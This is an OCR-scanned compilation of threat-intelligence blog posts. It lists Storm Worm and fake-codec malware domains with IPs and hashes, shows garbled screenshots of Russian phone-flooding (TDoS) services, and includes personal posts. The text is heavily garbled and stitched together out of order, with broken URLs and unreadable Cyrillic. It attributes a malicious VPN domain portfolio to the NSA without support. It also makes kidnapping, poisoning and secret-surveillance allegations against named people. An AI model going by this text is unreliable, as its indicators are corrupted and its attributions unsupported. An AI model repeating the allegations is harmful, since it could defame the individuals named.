nizations online include RATs (Remote Access Tools) malicious software part of a larger bother 
malicious and fraudulent spam and phishing emails including client-side exploits and vulner- 
abilities which have the potential to exploit an organization or a vendor's end points for the 
purpose of dropping malware on the affected host including the rise of the ransomware threat 
which is basically an old fashioned academic concept known as cryptoviral extortion. 


With more novice cybercriminals joining the underground ecosystem market segment largely 
driven by a set of newly emerged affiliate based revenue sharing fraudulent and malicious 
networks offering financial incentive for participation in a fraudulent scheme it shouldn’t be 
surprising that more people are actually joining the cybercrime ecosystem potentially causing 
widespread damage and havoc online. 


With cybercrime friendly forums continuing to proliferate it should be clearly evident that more 
people will eventually join these marketplaces potentially looking for new market segment 
propositions to take advantage of for the purpose of joining the cybercrime ecosystem and that 
more vendors will eventually continue to occupy and launch new underground forum market 
propositions for the purpose of promoting and looking for new clients for the services. 


In a World dominated by a geopolitically relevant Internet cybercrime ecosystem it shouldn’t 
be surpising that more international cybercrime gangs will eventually continue to launch new 
fraudulent and malicious spam and phishing campaigns that also includes malicious software 
Campaigns for the purpose of earning fraudulent revenue. 


With more affiliate based underground market segment based networks aiming to attract new 
uses where they would forward the risk for the actual infection process and fraudulent transac- 
tion to the actual user in exchange for offering access to sophisticated bulletproof infrastructure 
including advanced and sophisticated malware and ransomware releases it shouldn’t be sur- 
prising that more people are actually joining these affiliate networks for the purpose of earning 
fraudulent revenue in the process of causing havoc and widespread disruption online. 
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Overall | believe that the presentations from this event are worth watching and worth going 
through and | can’t wait to actually participate in the Call for Papers for the upcoming virtual 
Summit. 


Happy watching! 


1. https: //1.bp. blogspot. com/—uNDdRF15z18/YUceoxuwaBI /AAAAAAAAN-K/f3£C_1z3M24Wc4au0iSK40i 1 Ab6SmHhSgCLcBGASYHQ 
2. https://www. youtube. com/watch?v=gqsE2couc jg&list=PLfouvuA j spToL98xfq57bnRayEF LOXZwE&index=1 
3. 


4. https: //www. youtube. com/watch?v=YBt J3vwow9Y&list=PLfouvuAjspToL98xXfq57bnRayEF 10XZwE&index=4 
5. https://www. youtube. com/watch?v=bpiyrZTOG1E&list=PLfouvuAjspToL98Xxfq57bnRayEF1OXZwE&index= 
6. https://www. youtube. com/watch?v=cO0XqkotvOU&list=PLfouvuAj spToL98Xfq57bnRayEF 1OXZwE&index=9 


17.9.13 My Compilations of Personally Identifiable Information Belonging to Mul- 
tiple International and High-Profile Cyber Threat Actors - An Elaboration 
(2021-09-20 22:56) 


[1] 


Awesome! 


| just got my first Notice of European Data Protection Law Removal Request for my personal 
blog in particular for one of my compilations of personally identifiable information. Great stuff! 


1. https://1.bp.blogspot.com/-J18sJLvmiM4/YUX1_thkHOI/AAAAAAAAN98/nwVzTKNNyP4HWe 1b00015Tc3g0E6£FPOwCLcBGASYHQ 
s1672/Screenshot_3.png 


17.9.14 Exposing a Currently Active Malicious Free VPN Domain Portfolio Run and 
Operated by the NSA - An OSINT Analysis (2021-09-20 23:00) 


[1] 
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xaker top 


From [2 ]this. 


Currently active free VPN servive domains courtesy of the NSA known to have been partici- 
pating in the campaign: 


bluewebx.com 
bluewebx.us 
irsl.ga 
iranianvpn.net 
IRSV.ME 
DNSSPEEDY.TK 
ironvpn.tk 
ironvpn.pw 
irgomake.win 
make-account.us 
make-account.ir 
IRANTUNEL.COM 
JET-VPN.COM 
newhost.ir 
homeunix.net 
vpnmakers.com 
hidethisip.info 
uk.myfastport.com 
witopia.net 
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worldserver.in 
music30ty.net 
misconfused.org 
privatetunnel.com 
aseman-sky.in 
Related domains known to have been involved in the campaign: 
gaysexvideo.us 
keezmovies.us 
hitporntube.com 
enjoyfreesex.com 
allfreesextube.com 
thegaytubes.com 
sextubeshop.com 
pornfetishexxx.com 
ebonypornox.com 
freepornpig.com 
marriagesextube.com 
searchporntubes.com 
suckporntube.com 
darlingmatures.com 
pornretrotube.com 
teensexfusion.net 
rough18.us 
teendorf.us 
Lretrotube.com 
typeteam.com 
biosextube.com 
hadcoreporntube.com 
reporntube.com 
telltake.com 
asianprivatetube.com 
hostednude.com 
alfaporn.com 
sexbring.com 


porntubem.com 
16439 


newerotictube.com 
firstretrotube.com 
oralsexlove.com 
1lbdsmtubes.com 
hairytubeporn.com 
brunettetubex.com 
tubelatinaporn.com 
xxxgaytubes.com 
analxxxvideo.com 
analsexytube.com 
aeroxxxtube.com 
amateurpornlove.com 
admingay.com 
xxxretrotube.com 
xxxshemaletubes.com 
hotpornstartube.com 
firsttrannytube.com 
erotixtubes.com 
lLpornstartube.com 
lasiantube.com 
18mpegs.com 
maturediva.com 
elitematures.com 
vipmatures.com 
pcsextube.com 
porn-vote.com 
pornbrunettes.com 
maturedtube.com 
alfatubes.com 
maturetubesexy.com 
justhairyporn.com 
hotblowjobporn.com 
homemadetubez.com 
homemadexx.com 


golesbiansex.com 
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fuck-k.com 
freebdsmxxx.com 
emeraldporntube.com 
dosextube.com 
bigtitslove.com 
yoursex.sexy 
tubez.sexy 
japaneseporn.win 
hdfuck.me 
tubelesbianporn.com 
vipebonytube.com 
vipamateurtube.com 
largematuretube.com 
latinosextube.com 
xxxhardest.com 
tubebigtit.com 
tubesexa.com 
realfetishtube.com 


pornways.com 


Related domains known to have participated in the campaign: 


hi2panel.us 
androidserver.us 
make22.us 
make46.us 
make58.us 
make-account.us 
irspeedy.info 
memolfashion.com 
irspeedy.com 
downloadpluse.com 
make-account.com 
kashkashun.com 
erfan-shop.com 
digidoorbin.com 
make34.us 
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make94.us 
make82.us 
make70.us 
make166.us 
takeaw.us 
irspeedyy.us 
make-account2.us 
downloadplus.link 
mehrdad.biz 
mypayments.me 
appleid22.com 
susadns.com 
saba-sdi.com 
saba-sdi.design 


bluewebx.com 


2alfam an@gmail.com 


Domain (83) 


[3] 
Stay tuned! 


1. https://1.bp. blogspot . com/-£ZQ61iUQfUU/YThA4—-rhJI/AAAAAAAAN8s/60Z_YrAgw38CgkJy2zi8UpQNdFqlmckigCLcBGAsYHQ 


2. https://medium.com/@danchodanchev/how-the-nsa-utilized-iranian-cyber-proxies-to-participate-in-the-bound 
3 
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Demoticket .net - 64.28.184.168 
Hq-ticket .com - 64.28.184.168 
Turbo-codec .com - 64.28.184.168 
Hqticket .com - 64.28.184.169 
End-ticket .com - 64.28.184.169 
Nitro-codec .com - 64.28.184.169 
Hqaticket .net - 64.28.184.170 
Clean-ticket .com - 64.28.184.170 
Red-codec .com - 64.28.184.170 
Black-codec .com - 64.28.184.171 
Viva-ticket .com - 64.28.184.171 
Niceticket .net - 64.28.184.171 
Endticket .com - 64.28.184.172 
Ultra-codec .com - 64.28.184.172 
Wot-ticket .com - 64.28.184.172 
Mega-codec .net - 64.28.184.173 
Storm-ticket .com - 64.28.184.173 
Megaz-ticket .com - 64.28.184.174 
Vipcodec .net - 64.28.184.174 
Democodec .net - 64.28.184.175 
Giga-ticket .com - 64.28.184.175 
Demo-codec .net - 64.28.184.176 
Uin-ticket .com - 64.28.184.176 
Hopeticket .com - 64.28.184.177 


Hq-codec .net - 64.28.184.177 
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17.9.15 In Retrospective - The "Office" Circa 2006 Up To Present Day (2021-09-20 23:02) 


[1] 


Dear blog readers, 


This is Dancho. It’s been a while since I’ve last posted a high-quality update and I’ve decided to 
post and elaborate on some of my current and upcoming security and hacking projects with the 
idea to touch base with the loyal audience that’s been following my research since December, 
2005 when | originally this blog and actually feature a personal and never-published before 
sample photo of the "office" also known as the "lab" circa 2006 when | originally launched this 
blog while working for - [2]https://astalavista.com. 


In this post I’ll elaborate more on some of my current and upcoming projects including the 
recent re-launch of the original https://astalavista.box.sk which is the original search engine 
for hackers and security experts circa 1994 under my management including the re-launch of 
my personal online E-Shop for Intelligence Deliverables and elaborate more on some of the 
cool stuff that we’re doing at one of my current employers which is WhoisXML API including to 
discuss in-depth my latest researcher position at [3]https://cybernews.com. 


[4] 
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Ever since my original kidnapping and law enforcement issues circa 2010 I've participated 
in a Top Secret GCHQ Program known as "Lovely Horse" which monitors hackers and security 
experts for information and "know-how" with my old Twitter account and I’ve been also recently 
quoted in the official press release for the upcoming launch of the new https://linuxsecurity.com 
by Dave Wreski with whom | had the privilege to interview for the infamous Astalavista Security 
Group Newsletter circa 2003-2006. 


I’m also proud to let everyone know that I’ve launched an official Android [5]mobile application 
for my personal blog where the idea is to empower everyone with an easy to use Android mobile 
application which you can use and catch up with some of my research that I’ve been publishing 
at one of the security industry’s leading security publications since December, 2005. 
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[6] 


I’m also proud to let you know that I’ve successfully released a full offline copy of my personal 
blog which is currently available in multiple E-Book formats including Amazon Kindle where the 
idea is to make my personal blog a recommended reading potentially increasing my readership 
and reaching out to new users internationally. 


[7] 
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% of % of % of % of 


Blog covered covered timely robust 
10Cs iocterms 10Cs 10Cs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 

[8] 
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Best-codec .com - 64.28.184.178 
Hope-ticket .com - 64.28.184.178 
Endcodec .net - 64.28.184.179 
Zero-ticket .com - 64.28.184.179 
End-codec .net - 64.28.184.180 
Pop-ticket .com - 64.28.184.180 
Cleancodec .net - 64.28.184.181 


Yupticket .com - 64.28.184.181 


The deeper you go the more interesting it gets, malware command and controls located 
on the same network, fake banks, money mule recruitment sites, pharmaceutical scams and 
spam hosting - they or their customers if they are to forward the responsibility are definitely 
multitasking. 


Related posts: 

[2]Fake Porn Sites Serving Malware 

[3]Underground Multitasking in Action 

[4]Fake Celebrity Video Sites Serving Malware 

[5]Blackhat SEO Redirects to Malware and Rogue Software 
[6]Malicious Doorways Redirecting to Malware 


[7]A Portfolio of Fake Video Codecs 


1. http: //ddanchev. blogspot .com/2008/06/malicious-isps-you-rarely-see-in-any. html 
ttp://ddanchev. blogspot .com/2008/06/fake-porn-sites-serving-malware.html 


2. 
3. http: //ddanchev. blogspot .com/2008/06/underground-multitasking-in-action.htm 


4. http: //ddanchev. blogspot .com/2008/06/fake-celebrity-video-sites-serving.htm 


5. http: //ddanchev. blogspot .com/2008/06/blackhat-seo-redirects-to-malware-and.htm 


6. http: //ddanchev. blogspot .com/2008/06/malicious-doorways-redirecting-to.htm 
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7. http://ddanchev. blogspot . com/2008/03/portfolio-of-fake-video-codecs.htm 
4.7.10 Storm Worm’s U.S Invasion of Iran Campaign (2008-07-09 02:06) 


Orrortuntries ror Parrsors 
EARN ABOUT 
CCREDITED'’S VETERANS Procram 


Accredited 


) 


| ad soem a 


JS Army's Delta Force and U.S. Ax For 
n and broke down the Iran's Army ¢ 


mvaded Iran Approcamately 20000 solders crossed the 
The deo made by US solder was recerved today momng 
e Workd War DIL God save us 


eo to see Grst mantes of the begnn 


The Storm Worm-ers are keeping themselves busy, with two campaigns in less than a week, 
following the latest on [1]the 4th of July. Now, they are spreading rumors of a U.S invasion in 
Iran: 


"Just now US Army’s Delta Force and U.S. Air Force have invaded Iran. Approximately 
20000 soldiers crossed the border into Iran and broke down the Iran’s Army resistance. The 
video made by US soldier was received today morning. Click on the video to see first minutes 
of the beginning of the World War III. God save us." 


The campaign is using the following domains : 


statenewsworld .com 
1649 


89. https: //unit-123.org/wp-content/uploads/2021/05/shadowcrew-2.ra 
90. https: //unit-123.org/wp-content/uploads/2021/05/Hackersoft.ra 

91. https: //unit-123.org/wp-content/uploads/2021/05/BlackhatWorld.ra 
92. https: //unit-123.org/wp-content/uploads/2021/05/cardingmafia.ws.ra 
93. https: //unit-123.org/wp-content/uploads/2021/05/Nullnoss.org.ra 
94. https: //unit-123.org/wp-content/uploads/2021/05/365Exe.ra 

95. https: //unit-123.org/wp-content/uploads/2021/05/Aljyyosh.ra 

96. https: //unit-123.org/wp-content/uploads/2021/05/forum.cybsecgroup.com.ra 
97. https: //unit-123.org/wp-content/uploads/2021/05/Hackingboard. ra: 
98. https: //unit-123.org/wp-content/uploads/2021/05/Szenebox.ra 

99. https: //unit-123.org/wp-content/uploads/2021/05/Cardvilla.ra 

100. https: //unit-123.org/wp- content /uploads/2021/05/iHonker.ra 


101. https: //unit-123.org/wp- content /uploads/2021/05/SkyFraud.ra 

102. https: //unit-123.org/wp-content/uploads/2021/05/H4kurd.com.ra 

103. https: //unit-123.org/wp- content /uploads/2021/05/moneymaker .hk.ra 

104. https: //unit-123.org/wp- content /uploads/2021/05/CNSec.ra 

105. https: //unit-123.org/wp- content /uploads/2021/05/Cyberizm.ra 

106. 

107. https: //unit-123.org/wp-content/uploads/2021/05/forum.reverse4you.org.ra 
108. https: //unit-123.org/wp- content /uploads/2021/05/CNHonker. ra 

109. https: //unit-123.org/wp- content /uploads/2021/05/Ashiyane.ra 

110. https: //unit-123.org/wp-content/uploads/2021/05/security-teams.net.ra 
111. https: //unit-123.org/wp- content /uploads/2021/05/itsobr.com.ra 

112. https: //unit-123.org/wp- content /uploads/2021/05/Spyhackerz.ra 

113. https: //unit-123.org/wp- content /uploads/2021/05/ArmadaBoard.ra 

114 

115, 
116. 

117. https: //unit-123.org/wp- content /uploads/2021/05/Hackings.ra 


17.9.22 Deep From the Trenches in Bulgaria! - Part Two (2021-09-25 09:29) 


[1] 
[2]define:peasant 


Related posts: 
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[3]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Four 


[4]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Three 


[5]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Two 


[6]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria? 
[7]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
[8]Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two 


Sample personal complaint which | wrote but never really had the chance to send to local 
police for home molestation kidnapping and illegal arrest with stolen ID from my place: 


Zdraweite, 


Kazvam se Dancho Danchev svetoven specialist v sferata na borbata s 


kiber prestupnosta dete sum s EGN: EEE 1 mobilen telefon 
ee Troyan I mobilen telefon na mogta maika - 


I dnes reshih da podam signal otnosno sebe si I nezakonen nasilstven moi 
arest ot slujiteli na RPU Troyan v godinata 2@1@ s kradeni moi documenti 
koito prosto trqbvalo da predstavq I sus shteti v razmer na 85,000 leva 
or tormoz I lipsa na pravorazdavane I eventualen opit za otvlichane or 
mogta kushta v godinata 2@1@ ot sushtite slujiteli bez svideteli I bez 
pravorazdavane or strana na durjavata s cel da buda poseten ili privikar 


i da buda razpitan ot vashi slujiteli spored ugovorka Ili na mqsto na 
moi postognen adres koito ——_——, Es 
i dnes reshih da podam signal otnosno nezakonen arest otnasqsht se do 
men i posledvashta krajba i eventualno upoqvane na moi adres bez moe 


znanie s cel da buda poseten ili da buda privikan za izqsnqvane na 
obstogtelstva. 


V godinata 201@ nepoznato psihiatrichno bolno lice nahluva v kushtata v 
koqto jiveq i mi vadi documenti s drugo lice koeto go chaka na stulbite 
v kushti s ideqta da se vidim. Na sledvashtiq den policeiski sluhiteli 
ot RPU Troyan nahluvat v staqta v koqto jiveq i me izdurpvat nasila bez 
svideteli i mi pokazvat kopie na lichnata mi karta koeto ne sum 
predostavql i me vodqt s kola v neizqsnena posoka bez da e davane 
obqsnenie za zadurjaneto mi. Po putq pishat gorivoto na kolata s koqto 
sme na firma Lesoplast kogeto e firmata na maika mi i bashta mi kudeto 
te sa bili slujiteli predi godini sled koeto me otvqjdat v neizqsnena 
posoka v sgrada v grad Lovech i me vodqt pri chovek koito ne poznavam i 
stoim i ne mi se dava obqsnenie za zadurjaneto mi sled koeto ne karat dz 
si pokaja lichnata karta pred moite roditeli i da se podpisha i me 
zakluchvat v karcer v sgradata za period ot nqkolko meseca kato mi 
zakluchvat documentite i telefona i mi vzimat wryzkite na obuvkite i 
kolana bez da mi e davano obqsnenie za zadurjaneto mi. 


Prikachvam jalba koqto sum zapochnal da pisha v godinata 2016 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 


[9] 
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morenewsonline .com 
dailydotnews .com 
dotdailynews .com 


newsworldnow .com 


All registered by the same individual : 
ONLINE CO REANIMATOR (dfgdgf@gmail.com) 


REVA 13-27 Deribaska 3565,198346 DZ Tel. +321.3568872 


Sample detection rate : 

iran _occupation.exe 

Scanners Result: 4/33 (12.13 %) 

File size: 118273 bytes 

MD5...: 19ab8f1dddb743c1dc2924cb61d3f877 


SHA1..: €0915f377020479ba95ffed0fcb07a2b2aec72f4 
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Prikachvam jalba koqto sum zapochnal da pisha v godinata 2@16 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 
e arestuval nezakonno i me e izdurpal ot u nas s otkradnati documenti 
nasila i bez svidelite v godinat-a 201@ kato dnes sme 2021. 


Predpochitam da potursite maika mi po telefona zashtoto kato che li ne 
moga da prikazvam i neznam kakva e prichinata. 


Blagodarq. 
Dancho 
[10] 
Ao Hayanknka Ha ... PNY 
— 7 
CUTHAS/ KAIBA 
OT farnuo PNA bac crac cundassnnenckeaesteaebachaseecasGiecnenuen ees acuacnbe beueadesadesenasaenceecuneaeas ,ETH 


Ser See.) ————— | re eerrerrrrerrs ce rerere (EET cuntmmuanands 


ce cnyun cnepHoTo: Podavane na jalba za izqsnqvane na grajdansko polojenie, izqsnqvane, na 
obstoqtelstva I jalba za pravonamesa I lishavane ot intelekrualni sobstvenost I 


oer ee ee eee Cee eer eres? 


Kazvam se Dancho Danchev, EN {feeds ins —E——— CC]. ce : 
mobilen telefon ———, svetoven, specialist, v, sferata, na komputerna, sigurnost, I 
dnes reshih da podam, jalba, otnosno izqsnqvane na grajdansko polojenie, izqsnqvane, na, 
obstogtelstva, I pravonamesa za lishavane ot prava I intelektualna sobstvenost, s izqveno 
jelanie, da buda, privikan, za, poluchavane, na, avtobiografichna, spravka, I, za, da, razbera, 
dali, ne, sum, tyrsen, otnosno, izqznqvaneto, na, obstoqtelstva. V godinata, 2010, sled, moe, 
premestvane, na, vremenen, adres, v grad, Sofia, v, kvartalen, magazin, mi, se, dava, hrana, 
sled, koeto, posledvashtite, halucinacii, me, dovejdat, da, se, otstranq, ot, vunshni, contact, 
koeto, ne, me, spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnost. 


- Minko Minkov 

-  vtori policai 

-  treti policai 

-  sestra 

- durpat 

- pokazva kopie na lichna karta 


- edin nepoznat - vadi documenti 
- vtori nepoznat 


[11] 
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- ganev 
- dava pari 


- dwama nepoznati 
- -vilige na policeiska tehnika 
- dwama nepoznati 
- -ediniq go chaka 


V godinata, nepoznato psihichno bolno lice nahluva v kushtata mi I mi vadi dokumenti s drugo 
nepoznato lice koeto sushto e nahlulo v kushtata mi I go chaka na stulbite. Na sledvashtiq den 
policeiski, slujeteli, nahluvat, v, staqta, v koqto, spq, I bez, da, mi, davat, obqsnqnie, me, 
nakarvat, da, se, obleka, sled koeto, mi, pokazvat, kopie, ot lichna, karta, kogto, ne, sum, 
predostavql, I me otvejdat, s, nepoznata, kola, parkirana, pred, kushtata, kum, neizqsnena, 
posoka, kato, po, putq, prepisvat, gorivoto, za, prevoza, na, firmata, v koqto, raboti, moqta, 
maika, firma, Lesoplast, sled, koeto, me, otvejdat, v, psihiatrichno, zavedenie, grad, Lovech, 
sled, koeto, me, zavejdat, v, karcer, I, sled, koeto, bez, da, mi, bude, davano, obqsnenie, 
zapochvat, da, mi, slagat, injekcii, s, kopleksol, bez, da, mi, bude, davano, obqsnenie, za, 
zadurjeneto, mi. Sushtata, vecher, v karcera, vuvejdat, drugo, lice, izvestno, kato, Kamen Tzura 
grad, Troyan, sled, koeto, sled, molba, bivam, izvejdan, navun I prekarvam, noshta, na, leglo, 
ostaveno, v, koridora. Sushtoto, lice, napuska, psihiatrichnoto, zavedenie, bez, da, dava, 
obqsneniq, kato, prez, cqloto, vreme, ne, mi, e, davano, obqsnenie, za, zadurjaneto, mi. 


V godinata, 2011, lice, predstavqshto, se, za, Dobrin, Danchev, poseshtava, doma, mi, zaedno, 
sus, jena, sushtata, vecher, sled, povrushtane, razbiram, za, otrovena hrana, sled, koeto, 
posledvashtite, halucinacii, me, dovejdat, da, se, otstranq, ot, vunshni, contacti, koeto, ne, me, 
spira, da, produlja, mogta, rabota, v, sferata, na, komputerna, sigurnost. 


V godinata 2012, sled, poseshtenie, v, hotel, Sheraton, grad, Sofia, razbiram, che, otnovo, sum, 
upotrebil, otrovena, hrana, sled, posledvashtite, kontaki, se, otranqvam, ot, vunshni, contact, 
koeto, ne, me, spira, da, produlja, moqta, rabota, v, sferata, na, komputerma, sigurnost. 


V godinata 2012, sled, poseshtenie, v, hotel, Hilton, grad, Sofia, otnovo, razbiram, che, sum, 
upotrebil, otrovena, hrana, sled, posledvashtite, kontaki, otnovo, se, otrstranqvam, ot, vunshni 
contacti, koeto, ne, me, spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnos! 


V godinata, 2014, sled, nanasqne, v hotel, Florimont, grad, Sofia, otnovo, razbiram, che, sum, 
upotrebil, natrovena, hrana I sled, prenoshtuvane, na, syntrinta, se, sabujdam, s, halucinacu, I 
sled, posledvashtite, kontaki, otnovo, se, otstranqvam, ot, vunshni, kontakti, koeto, ne, me, 
spira, da, produlja, moqta, rabota, v, sferata, na, komputerna, sigurnost. 


V godinata 2018 nepoznato lice predstavqshto se za Vasil Stanev ot Dans me posheshtava za da 
mi prediaga rabota I da me kara da hodq na doktor. 


Kato, svetoven, specialist, v, sferata, na, komputerna, sigurnost, az, produljavam, moqta, 
rabota, v, sferata, na, komputerna, sigurnost i bih, jelal, da, buda, privikan, za, izqsnqvane, na, 
obstogtelstva I da, razbera, dali, ne sum, tyrsen, za, izqsnqvane, na, obstogtelstva. 


Blagodarq, za, vasheto, vnimanie, I shte, ochakvam, da, buda, privikan, za, izqsnqvane, na, 
obstoqtelstva, I da, razbera, dali, ne, sum, tyrsen, za, izqsnqvane, na obstoqtelstva. 


fp. Tponx 
08.08.2016 


Sample complaint from Bulgaria’s President Georgi Parvanov regarding Yavor Kolev in terms 


of harassment of a Bulgarian blogger: 
[12] 
Teopru NepBaHos @georgeparvanoy - Jul 21, 2011 see 
Replying to @bo_go 
O6ABABaM Ce KaTErOpuuHO Cpelly NpecnegBaHeTO Ha @bO_Eo OT CTpaHa Ha 


@dansbg u @ykolev Noctenkata Ha Boromus e A0G6NectHa, HALMOHANHO 
OTTOBOpHa 


Stay tuned! 


1. https://1.bp. blogspot .com/-I3s0GPZYJ8s/YU7NF2YQCoI /AAAAAAAAN-8/emSD1dItmF cz6N1QtsUz67ZOM8TS9C4rQCLcBGASYHQ 
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. https://www.google.com/search?q=def ine/3Apeasant 
. https: //ddanchev. blogspot .com/2021/03/dancho-danchevs-disappearance-2010.htm 
. https://ddanchev. blogspot .com/2021/03/dancho-danchevs-disappearance-2010.htm 


. https: //ddanchev. blogspot . com/2020/12/how-i-got-robbed-and-beaten-and. htm] 

. https: //ddanchev. blogspot .com/2019/11/dancho-danchevs~disappearance-2010.html 

. https: //ddanchev. blogspot . com/2019/04/dancho-danchevs-2010-disappearance -htm1 

. https: //1.bp.blogspot . com/-j jmvkTdnDoI/YU700BteacI/AAAAAAAAN.M/isdAG7uic2MK6Elodkde6GvcKpx4QyQSwCLcBGAsYHQ 
10. 
11. https://1.bp. blogspot . com/-o-tPZCJLn6Q/YU7005J_PVI/AAAAAAAAN_Y/DTaP5EyHqw0XmPcRqaqZ- 4N9uj6wvAyrwCLcBGAsY 


12. https://1.bp.blogspot.com/-1w_IuBa-530/YU7NQA1gjCI/AAAAAAAAN A/GQyuNOMIkhU7 1NgT2e5Vu_-NS2a5ifxCwCLcBGAs 


Q/s519/Screenshot_8.png 
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17.9.23 Exposing Random TDoS (Telephony Denial of Service) Screenshots 
(2021-09-27 20:50) 


An image is worth a thousand words. 


[1] 
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specialxss.net 


= 


ELITE Te EMBL FLL, ROLY Ie MERON GE RT ink, MLTR The STONEY, HELTON BONO LOT Int, HELIOPE STON T ONO RAL, HERSIOM ONT Ind 


Onya Mo6unbHpix Tenecdouos 


COom HOMepa H3-38 HENDEDWBHEIX BIOBOS C KOPOTKHM MHTepBANOM 
BPEMEnist, 

Bnageney WOMENS HE CHOKET BOCNONRDOSITECA CBOUM TENeDowom. 
NlOsBOHMTb, NPHHATS APYTHE BHDOEH. OTNPIBAATS coobwenna 6yper ne 
BOIMOXKHO. 

MoGunbybilt Gyner paspeiBaTecAa OF BXOMAUYIX IBOHKOB CTOABKO-CKOAbKO 
nomenaere. 

Cnenaem SecnnatHeit Tecr. 

Yenyra goctynua ana abovexros PO. 


Uexa 3a 1 HOMep: 
1 wac - 350 py6. 

2 vaca - 699 py6. 
3 vaca - 899 py6. 


[2] 


@ OTKANYeHHe CanTOosB 
a Onya renedoua 
@ Cans C Ham 


) Hosocm 


Th Onys 


Mapr 10, 2012 


@ floctynua Hosan ycnyra “Orkniouenne 


B icq: 421961 
5 skype: xaker_antivirus 


M Emak specakss.net@gmai.com 


[5] 
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| ‘AUTO DIALER 


[6] 
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Teleport 


NPOTPAMMbI YCYTK KOHTAKTbI 


ABTOAO3BOHLIMK SKYPE 


Tenecouusiil cnamep Ha Gaze Skype 
MouHtan cHcreMa Teteo HHI ChaMep KOTOpbIil 3acTaBuT Balmero Tonapitita CMeHIT 
nomep. 


Q@ynkuHH MporpamMMBI: 


* JRONKH Ha BCe BABI TeTedonos 

* Hempepsiensili 20320H 

* CHHCOK HOMepOR H CTraTHCTHKa ClaMa 

* Tip CHATHH TpyOKH Ball JeHEI He CHIMMalOTCA IPH YCIOBHH XOpolero HHTepHeTa Ht 
He Craboro KOMMBWTepa 

© ZBONKH HAYT CO CKpbITOTO HOMepa HAM BLICRe4“MBAIOTLCA HOMepa Skype, BAIMHCINTL 


[7] 


HAW NPOPPAMMbI 


n 
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Pass-Hack — 


B3nom nouTbi ObICTpO, AHOHMMHO, bes NnpeAoNnNaTDi 


sbIBAnTE TRITIOSHM Tor Onya 


Onyg Tenedoua MeHio 


Tnaensan 
Zaxaxpisanre 
C60 HomMepa M3-3a HENpep OTKMM MHTEpBz 4 BPEMeHn. Orxnioumm caltret 
Bnageney HOMepa He C Tenedow ® 
HVTb, NDKHATS APyMe ByisOBy. OTNPaBNATS CooGueHMA GygeT HE YA renedona 


1O#KHO. 


NocneaHve HOBOCTH 


3.2013 - Orxniouun caltres, 


bien 6yaer PasSPelIBaToCA OT BXOAAUIMX BESOBOS CTONDKO~CKONbKO 


noppobno 


nya tenedona 


24.10.2012 - O6yuenne ssnony 
UéerHbl Ha yornyrnu: Npodecawonansno 
1 yac - 500 py6 
Onnata: Webmoney, Akgekc aeHerm KONTaKTbI AA CBASH 


Aenaem Tecr. 


3aKazaTb Onyg Tenedoua 


Homep renedora* 


Bpema ataxn? 


Baw KOHTaKTEI” 


MononxntenbHar 


vncbopmauna* 


Beenure cumBonni c 


KaPTHHK 
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Storm Worm domains used in recent campaigns, still parked on infected hosts : 


superlovelyric .com 
bestlovelyric .com 
makingloveworld .com 
statenewsworld .com 
wholoveguide .com 
gonelovelife .com 
loveisknowlege .com 
lovekingonline .com 
lovemarkonline .com 
wholefireworksonline .com 
morenewsonline .com 
makingadore .com 
greatadore .com 
yourfireworksstore .com 
loveoursite .com 
dayfireworkssite .com 
musiconelove .com 
knowholove .com 
whoisknowlove .com 
theplaylove .com 
lovelifecash .com 
wantcherish .com 


shelovehimtoo .com 
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CO 246223 & V71717117 


Phone flood New technologies 
*Kenaete copeaTs cAenky KouKypentam? Mapammosats padoty odwica? Vinw Ours Mobi HE NONbSyeMCA Cran 
MOXET NPOCTO HACONMTb HEyTONHOMY Bam YENoBeKy? Hiecaxnx Npoonem! DNyAMNKAMH, BEC COMT 
Npeanoraem Ba BOCNONeIOBATECA Halwer yCNyTonR “Dnyg Tene@ouos™ Hanvicak HAMM MH HE MaAXOMTCR B 
Kak 3TO padotaet? Ha Teneou ®epTBb! BEAYTCA HENPEPeABHLIe JBOHKM, Npet ceo6ognom foctyne ceTn 
NODHATHH ThyOKH CBAS> OOpDiBaeTcA NwGO NO BaWEeMYy WENAHMIO NpOMrpHIBaETCA WHTEPHET 
moan 3anvice 
Liena: 40$ cya = CO ann canin 246223 
171717117 
- 


Zz 
PRO 000S SERVICE © 2012 | JAKAIATR ONT TENROCOHA 
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: Maya Tenedouos!!! bes 610KHpoBKH Hansaunre nove 
Mobile 777 Sax renee : 


[Treseen | Hegoporne 380HKu!!! 


Henoporue ston No ecemy minpyit! 


Crarnctma caitra 


O KomnaHnn 


Sapascteyiire! Npeanaraem Bawemy sHvmaxmm Dnyg Tenedoxos! Paspywere nnave CBOMK KOKKYDeHTOS Wnt CoenaliTe Tax, 
uToGe y Beaux DiaKomex Ben MOCTORHMO JaKAT TeENeDoHI!! B oTAMUMEe OT ADYTHX, y NaC axKayWTR He BnompypoTCA 22 
copepwerite 50 # Gonee s80HKO8 8 DeHe! 

Npenocraannetca nporpamma ana Oryaa, wactpoure u nporpanna Gyget DaboTare aBToNaToM. 

